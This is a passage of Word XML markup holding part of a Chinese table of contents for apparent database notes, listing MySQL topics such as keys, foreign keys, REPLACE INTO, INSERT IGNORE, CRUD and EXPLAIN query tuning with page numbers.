              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779528 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36034039" w14:textId="7FA425AF" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779529" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>键的索引</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779529 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35C3AE10" w14:textId="17351737" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779530" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>replace into</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>语句</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779530 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EF9701C" w14:textId="28019F89" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779531" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>约束：主键、唯一性约束的键</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779531 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="324EA2E9" w14:textId="27A78B35" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779532" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>外键</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779532 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DCC9C17" w14:textId="12450FF9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779533" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>修改表新增外键：增和删</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779533 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D8CD0DB" w14:textId="14C25BCE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779534" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CURD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779534 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E354BBC" w14:textId="0C8AB488" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779535" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>插入数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779535 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DA72D9B" w14:textId="0364895E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779536" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>更改数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779536 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="118D8A00" w14:textId="396170AE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779537" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>删除数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779537 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DF3CAAF" w14:textId="21FCD0FB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779538" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>replace into:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>无则加，有则改</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779538 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CB38D9E" w14:textId="735C9CF8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779539" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INSERT IGNORE INTO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779539 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F4CAB8E" w14:textId="3A3A9748" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779540" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>修改某列的值</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779540 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B5E5987" w14:textId="597C016E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779541" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查看正在进行查询的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>语句</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779541 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D9D5BF3" w14:textId="74CE5C84" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779542" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>explain</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：性能优化</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779542 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68DD2CD3" w14:textId="56630D74" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779543" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>链接类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779543 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="080D99A9" w14:textId="5B5C6A7A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779544" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>检查是否是全表扫描：对</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>datetime</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>建立索引不起效</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779544 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CCC974E" w14:textId="61A46CAF" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779545" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>内嵌查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779545 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FD53393" w14:textId="35EE0D43" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
